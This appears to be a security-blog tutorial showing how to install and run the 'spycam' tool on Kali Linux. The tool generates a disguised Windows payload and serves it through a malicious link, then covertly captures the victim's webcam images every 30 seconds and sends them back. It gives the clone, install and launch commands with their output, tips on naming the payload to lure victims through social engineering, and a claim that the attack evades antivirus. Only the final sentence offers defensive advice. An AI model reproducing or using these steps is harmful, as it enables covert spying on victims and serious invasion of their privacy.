Introduction
Many people around the world are always interested to peek into other person computer. Image a hack that will help you to peek into other person webcam. Yes, today we will show you on how easy is for hackers to hack into someone computer and watch the webcam to take pictures every 30 seconds. This all is done using sending malicious URL to victim and impersonating him/her to click on binary. Researcher of International Institute of Cyber Security commented, that small change is attack will be undetectable by Anti-viruses and will be completely FUD. Earlier we demonstrated on how hackers find it easy to hack whatsapp of somebody using single link.
We will walk you through steps on how a hacker can remotely take pictures of the victim using spycam tool. The main aim of the spycam tool is to take the pictures from the victim’s webcam for every 30 seconds and sends picture’s back to hackers.
Environment
- Os: Kali Linux 2019.3 64 bit
- Kernel-Version: 5.2.0
Installation Steps
- Use this command to clone the project.
- git clone https://github.com/thelinuxchoice/spycam
root@kali:/home/iicybersecurity# git clone https://github.com/thelinuxchoice/spycam Cloning into 'spycam'... remote: Enumerating objects: 27, done. remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27 Receiving objects: 100% (27/27), 52.83 KiB | 221.00 KiB/s, done. Resolving deltas: 100% (9/9), done.
- Use the cd command to enter into spycam directory
root@kali:/home/iicybersecurity# cd spycam/ root@kali:/home/iicybersecurity/spycam#
- Next, use this command to install the dependencies bash install.sh
root@kali:/home/iicybersecurity/spycam# bash install.sh [+] Updating and downloading Mingw-w64 Ign:1 https://deb.globaleaks.org buster/ InRelease Hit:3 https://deb.globaleaks.org buster/ Release Hit:2 http://ftp.harukasan.org/kali kali-rolling InRelease Reading package lists... Done =========================================================================================================SNIP======================================================================================================================== rl-errors.3 curl_easy_strerror.3 curl_multi_strerror.3 curl_share_strerror.3 '/usr/i686-w64-mingw32/share/man/man3' /usr/bin/install -c -m 644 curl_global_init_mem.3 libcurl-tutorial.3 curl_easy_reset.3 curl_easy_escape.3 curl_easy_unescape.3 curl_multi_setopt.3 curl_multi_socket.3 curl_multi_timeout.3 curl_formget.3 curl_multi_assign.3 curl_easy_pause.3 curl_easy_recv.3 curl_easy_send.3 curl_multi_socket_action.3 curl_multi_wait.3 libcurl-symbols.3 libcurl-thread.3 curl_multi_socket_all.3 curl_global_sslset.3 curl_mime_init.3 curl_mime_free.3 curl_mime_addpart.3 curl_mime_name.3 curl_mime_data.3 curl_mime_data_cb.3 curl_mime_filedata.3 curl_mime_filename.3 curl_mime_subparts.3 curl_mime_type.3 curl_mime_headers.3 curl_mime_encoder.3 libcurl-env.3 libcurl-security.3 '/usr/i686-w64-mingw32/share/man/man3' make[6]: Leaving directory '/opt/curl-7.61.1/docs/libcurl' make[5]: Leaving directory '/opt/curl-7.61.1/docs/libcurl' make[4]: Leaving directory '/opt/curl-7.61.1/docs/libcurl' make[3]: Leaving directory '/opt/curl-7.61.1' make[2]: Leaving directory '/opt/curl-7.61.1' make[1]: Leaving directory '/opt/curl-7.61.1' [+] Configuring PHP (php.ini)
- Next, use this command to give the file permissions chmod +x spycam
root@kali:/home/iicybersecurity/spycam# chmod +x spycam
- Now, use this command to launch the tool. ./spycam
- We successfully launched the tool
- Now, we have to set the payload name. Payload name should is something to provoke victim onto clicking it.
- After that it generates a payload with .exe extension, then it starts PHP servers to provide a malicious link.
- Next send this malicious link to the victim using social engineering.
- If victims open the URL in the browser
- It downloads the payload.exe file automatically.
- If victims run the .exe file in his machine it executes the payload on his machine and webcam starts taking the pictures from the webcam.
- After taking the pictures, it saves all the pictures in uploadedfile directory.
- There we can file all the pictures.
root@kali:/home/iicybersecurity/spycam/uploadedfiles# ls 29May2020120754image.bmp 29May2020120857image.bmp 29May2020121007image.bmp
- Now, open the Image, and let’s see whether the tool captured the image of the victim. Below you can see the captured image of Victim.
- Successfully we got the victims Picture.
Conclusion
We saw how easy to take pictures of the victim from his webcam by executing a single malicious file. Most of the people and hackers use these kind of techniques. So it is always recommended to not click on any unknown link and install unknown binary.
Cyber Security Specialist with 18+ years of industry experience . Worked on the projects with AT&T, Citrix, Google, Conexant, IPolicy Networks (Tech Mahindra) and HFCL. Constantly keeping world update on the happening in Cyber Security Area.
